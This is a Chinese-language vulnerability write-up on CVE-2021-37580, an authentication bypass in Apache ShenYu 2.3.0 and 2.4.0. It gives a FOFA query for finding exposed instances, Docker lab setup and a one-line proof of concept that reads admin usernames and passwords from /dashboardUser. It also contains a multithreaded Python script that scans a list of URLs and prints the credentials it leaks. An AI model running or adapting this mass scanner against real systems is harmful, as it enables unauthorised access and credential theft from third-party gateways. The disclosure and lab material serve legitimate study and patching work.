0x01 漏洞详情
ShenYu(原名 Soul)是一款高性能,响应式的网关,同时也是应用于所有微服务场景的,可扩展、高性能、响应式的 API 网关解决方案。
该框架由于JWT认证的不正确使用,导致Apache ShenYu 2.3.0和2.4.0版本,攻击者可以绕过身份验证,直接进入目标系统后台。
0x02 影响版本
Apache ShenYu 2.3.0
Apache ShenYu 2.4.0
0x03 fofa语法
body="id=\"httpPath\"" && body="th:text=\"${domain}\""
0x04 环境搭建
docker pull apache/shenyu-admin:2.4.0
docker run -d -p 9095:9095 apache/shenyu-admin:2.4.0
0x05 漏洞复现
poc
http://ip/dashboardUser
访问dashboardUser即可看到用户名和密码,通过该密码可登陆后台。
0x06 批量poc
# -*- coding: utf-8 -*-
# @Time : 2021/11/23 9:04
# @Auth : AD钙奶
import requests
import threadpool
requests.packages.urllib3.disable_warnings()
def verify(urls):
url = urls + '/dashboardUser'
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
try:
res = requests.get(url=url, headers=headers, verify=False, timeout=5)
if res.status_code == 200 and "query dashboard users success" in res.text:
if res.json()['data']['dataList']:
print(f"\033[31m[+] 目标系统: {url} 存在JWT缺陷漏洞(CVE-2021-37580)\033[0m")
num = 1
for i in res.json()['data']['dataList']:
print(f"\033[31m[{num}] 存在账号:{i['userName']} 密码:{i['password']} \033[0m")
num = num + 1
except Exception as e:
pass
def get_file_url():
with open("url.txt", 'r', encoding='UTF-8') as f:
_urls = f.readlines()
urls = [url.strip() for url in _urls if url and url.strip()]
return urls
def main():
url = get_file_url()
pool = threadpool.ThreadPool(5)
res = threadpool.makeRequests(verify, url)
[pool.putRequest(req) for req in res]
pool.wait()
if __name__ == "__main__":
main()